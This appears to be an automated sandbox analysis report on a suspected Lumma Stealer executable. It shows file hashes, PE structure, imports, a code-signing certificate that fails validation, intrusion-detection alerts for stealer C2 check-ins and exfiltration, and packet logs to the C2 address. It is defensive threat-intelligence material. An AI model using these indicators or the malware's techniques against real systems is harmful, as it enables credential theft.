                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                Process:C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (945)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4452
                                                                                                                                                Entropy (8bit):5.066280681782208
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:5q41lJM8WOxEj4/wPsAG4oevjKEcXrCnBBkpBxVGLrGWnSTw2wptI8Id6Pu:5hPA5jKEcXrCnTkpBxFEnx/ICu
                                                                                                                                                MD5:73F2D5F6E4AB794BFA3A93027F8A2FF1
                                                                                                                                                SHA1:336CB9EC424BAF14B0D0BE79062A563C155C75A1
                                                                                                                                                SHA-256:9A7045BCD93502F439AE8FD2B1B322181F9A94A6A15262199CC693C04ACA22CF
                                                                                                                                                SHA-512:1484CD5BD4E6D75E17ABCFC6CBFB1CB776AB0EBB6340DA70C796E1A02349FB917C6FB617F21EDEEB82C848E6205911371E5815B01FB9E0786AF62E459EE0E91E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>Error</title>.. . <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free.">. <meta name="keywords" content="paste, markdown, publishing, markdown paste, markdown from command line">.. <meta name="twitter:card" content="summary" />. <meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />. <meta name="twitter:title" content="Rentry.co - Markdown Paste" />. <meta name="twitter:site" content="@rentry_co" />. <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />.. <meta property="og:url" content="https://rentry.co/" />. <meta property="og:title" content="Rentry.co - Markdown Paste Service" />. <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />. <meta property="og:image" content="https://rentr
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.519358653105247
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.79%
                                                                                                                                                • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                File name:#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                File size:1'730'416 bytes
                                                                                                                                                MD5:c6107e0d217c3ce4f5d8c6198622556b
                                                                                                                                                SHA1:77a152d6872184eb11824aea4371b7cb9577ea5d
                                                                                                                                                SHA256:fec28394e0eef7ed5360f4a4ad4dc04e7c38afa25cb3086f988042a383dfe97d
                                                                                                                                                SHA512:4a776b895a655f8ff8d0c454f88b3a5af5bbdafa0b2cdbe0764220cf998aa29dea1077e2a52b17fe948c39331e417c37f6692ab813d206852d3dc416f9977bae
                                                                                                                                                SSDEEP:24576:vrIWzIGJHrHPcf6ZzI5SuxumqUQk0+xBFQbtLlDy/pyy/pNNx4/rdnfRSnJ8eR7H:vN7JbTIAtRe/P//2rdf6
                                                                                                                                                TLSH:F4858E225C6465A9FB5242B53F791E22C83D3F322FA4552CAB627D8C2EBCF6B55041C3
                                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                Icon Hash:5fc1c131094d9e07
                                                                                                                                                Entrypoint:0x463c48
                                                                                                                                                Entrypoint Section:CODE
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:1
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:1
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:1
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:92db50972771bbc9741d8dba3b89adb3
                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                Error Number:-2146869232
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 03/05/2023 01:00:00 03/05/2026 00:59:59
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Emjysoft, O=Emjysoft, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:3A209510BAACD4B48C20A0F8656AA26A
                                                                                                                                                Thumbprint SHA-1:47D58D082C452B3086973BEE37FB549F965F9E0B
                                                                                                                                                Thumbprint SHA-256:6F9838A2DA08559B3E0FE2156E99EA0AA4F3D1CD43675980B806CDECA7A5E616
                                                                                                                                                Serial:00989AAB57D7FCC43812B213AEDEA41AB6
                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                add esp, FFFFFFF4h
                                                                                                                                                push ebx
                                                                                                                                                mov eax, 00463A68h
                                                                                                                                                call 00007F48687F45D0h
                                                                                                                                                mov ebx, dword ptr [00464D18h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                call 00007F4868819D07h
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, 00463D08h
                                                                                                                                                call 00007F4868819A13h
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                add eax, 34h
                                                                                                                                                mov edx, 00463D38h
                                                                                                                                                call 00007F48687F2B1Ch
                                                                                                                                                mov ecx, dword ptr [00464BCCh]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [00463614h]
                                                                                                                                                call 00007F4868819CF1h
                                                                                                                                                mov ecx, dword ptr [00464D54h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [0046205Ch]
                                                                                                                                                call 00007F4868819CDEh
                                                                                                                                                mov ecx, dword ptr [00464D7Ch]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [00462C68h]
                                                                                                                                                call 00007F4868819CCBh
                                                                                                                                                mov ecx, dword ptr [00464D68h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [004602F4h]
                                                                                                                                                call 00007F4868819CB8h
                                                                                                                                                mov ecx, dword ptr [00464DF4h]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [0044EA78h]
                                                                                                                                                call 00007F4868819CA5h
                                                                                                                                                mov ecx, dword ptr [00464DCCh]
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                mov edx, dword ptr [0045F9B0h]
                                                                                                                                                call 00007F4868819C92h
                                                                                                                                                mov eax, dword ptr [ebx]
                                                                                                                                                call 00007F4868819D17h
                                                                                                                                                pop ebx
                                                                                                                                                call 00007F48687F2919h
                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x660000x1e1c.idata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x136e00.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1a3a000x2d70.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000x66e0.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x690000x18.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                CODE0x10000x62d440x62e00a608b75b620bc9899da54425632a33e5False0.5154768489254109data6.498737751055233IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                DATA0x640000xe2c0x1000b9ffc5470506451801f9a3ee8bb378ebFalse0.396240234375data3.9376047457579335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                BSS0x650000xa650x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .idata0x660000x1e1c0x20001e4c463a52feae64e21dcc93c56c27feFalse0.358642578125data4.711728774841513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .tls0x680000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rdata0x690000x180x2006eda95e7f89fac29502da04b93c31e66False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x6a0000x66e00x68002a6e3bd94e29f2f2a46d5c3d5d03f649False0.6045297475961539data6.636864870170326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x710000x136e000x136e00ab6dad1a6881f59023e131ce70af5cd4False0.42046611127864897data7.584171439487795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_CURSOR0x71b580x134Targa image data 64 x 65536 x 1 +32 "\001"FrenchFrance0.5714285714285714
                                                                                                                                                RT_CURSOR0x71c8c0x134data0.4642857142857143
                                                                                                                                                RT_CURSOR0x71dc00x134data0.4805194805194805
                                                                                                                                                RT_CURSOR0x71ef40x134data0.38311688311688313
                                                                                                                                                RT_CURSOR0x720280x134data0.36038961038961037
                                                                                                                                                RT_CURSOR0x7215c0x134data0.4090909090909091
                                                                                                                                                RT_CURSOR0x722900x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                RT_CURSOR0x723c40x134data0.38636363636363635
                                                                                                                                                RT_CURSOR0x724f80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                RT_ICON0x7262c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsFrenchFrance0.6252665245202559
                                                                                                                                                RT_ICON0x734d40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsFrenchFrance0.769404332129964
                                                                                                                                                RT_ICON0x73d7c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsFrenchFrance0.611271676300578
                                                                                                                                                RT_ICON0x742e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600FrenchFrance0.3741701244813278
                                                                                                                                                RT_ICON0x7688c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224FrenchFrance0.599671669793621
                                                                                                                                                RT_ICON0x779340x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088FrenchFrance0.725177304964539
                                                                                                                                                RT_STRING0x77d9c0xecdata0.5466101694915254
                                                                                                                                                RT_STRING0x77e880x130data0.5493421052631579
                                                                                                                                                RT_STRING0x77fb80x224data0.4306569343065693
                                                                                                                                                RT_STRING0x781dc0x5ccdata0.32681940700808626
                                                                                                                                                RT_STRING0x787a80x254data0.5016778523489933
                                                                                                                                                RT_STRING0x789fc0x128data0.5304054054054054
                                                                                                                                                RT_STRING0x78b240x2d8data0.4532967032967033
                                                                                                                                                RT_STRING0x78dfc0x4a8data0.3859060402684564
                                                                                                                                                RT_STRING0x792a40x43cdata0.34501845018450183
                                                                                                                                                RT_STRING0x796e00x314data0.37817258883248733
                                                                                                                                                RT_STRING0x799f40xe4data0.5570175438596491
                                                                                                                                                RT_STRING0x79ad80xb8data0.5543478260869565
                                                                                                                                                RT_STRING0x79b900x384data0.4266666666666667
                                                                                                                                                RT_STRING0x79f140x434data0.370817843866171
                                                                                                                                                RT_STRING0x7a3480x368data0.39908256880733944
                                                                                                                                                RT_RCDATA0x7a6b00x10data1.5
                                                                                                                                                RT_RCDATA0x7a6c00x2b0data0.7311046511627907
                                                                                                                                                RT_RCDATA0x7a9700x2722Delphi compiled form 'TEnvoyerResultatDlg'0.3609502894789379
                                                                                                                                                RT_RCDATA0x7d0940x644e6Delphi compiled form 'TEtoileDlg'0.4514499067795373
                                                                                                                                                RT_RCDATA0xe157c0x2cb13Delphi compiled form 'TPerfCDInfoDlg'0.19966786664408742
                                                                                                                                                RT_RCDATA0x10e0900x12412Delphi compiled form 'TPerfCDROMChartDlg'0.10465427310418617
                                                                                                                                                RT_RCDATA0x1204a40x2d672Delphi compiled form 'TPerfCDROMDlg'0.1919825778351347
                                                                                                                                                RT_RCDATA0x14db180x77fDelphi compiled form 'TSelectionCDROMDlg'0.39030745179781134
                                                                                                                                                RT_GROUP_CURSOR0x14e2980x14Lotus unknown worksheet or configuration, revision 0x1FrenchFrance1.25
                                                                                                                                                RT_GROUP_CURSOR0x14e2ac0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_CURSOR0x14e2c00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_CURSOR0x14e2d40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                RT_GROUP_CURSOR0x14e2e80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_CURSOR0x14e2fc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_CURSOR0x14e3100x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_CURSOR0x14e3240x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_CURSOR0x14e3380x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                RT_GROUP_ICON0x14e34c0x5adataFrenchFrance0.7333333333333333
                                                                                                                                                RT_VERSION0x14e3a80x360dataFrenchFrance0.4652777777777778
                                                                                                                                                RT_MANIFEST0x14e7080x2bdXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4893009985734665
                                                                                                                                                DLLImport
                                                                                                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpyA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                user32.dllGetKeyboardType, LoadStringA, MessageBoxA
                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, GetModuleFileNameA
                                                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey
                                                                                                                                                kernel32.dllWriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ReadFile, OutputDebugStringA, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                gdi32.dllUnrealizeObject, TextOutA, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetBrushOrgEx, GetBkColor, GetBitmapBits, ExcludeClipRect, EnumFontsA, EnumFontFamiliesExA, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt, Arc
                                                                                                                                                user32.dllWindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIcon, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                comctl32.dllImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                shell32.dllShellExecuteA
                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                FrenchFrance
                                                                                                                                                EnglishUnited States

                                                                                                                                                Download Network PCAP: filteredfull

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2025-01-28T16:12:23.295506+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949805172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:35.235027+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949805172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:35.235027+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949805172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:35.723772+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949882172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:36.218632+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949882172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:36.218632+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949882172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:37.124523+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949891172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:12:49.974505+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949224172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:02.961072+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949233172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:04.118061+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949233172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:05.572469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949234172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:23.199997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949235172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:36.459364+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949236172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:37.219436+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949236172.67.202.141443TCP
                                                                                                                                                2025-01-28T16:13:37.708029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949237104.26.3.16443TCP
                                                                                                                                                • Total Packets: 121
                                                                                                                                                • 443 (HTTPS)
                                                                                                                                                • 53 (DNS)
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jan 28, 2025 16:12:22.810014009 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:22.810067892 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:22.810142040 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:22.817190886 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:22.817233086 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:23.294924021 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:23.295506001 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:23.299551964 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:23.299576998 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:23.299958944 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:23.348419905 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:23.496938944 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:23.496964931 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:23.497101068 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.235045910 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.235146046 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.235198021 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.238527060 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.238545895 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.238558054 CET49805443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.238564014 CET44349805172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.262629986 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.262670040 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.262723923 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.263284922 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.263304949 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.723675013 CET44349882172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:12:35.723772049 CET49882443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:12:35.729639053 CET49882443192.168.2.9172.67.202.141
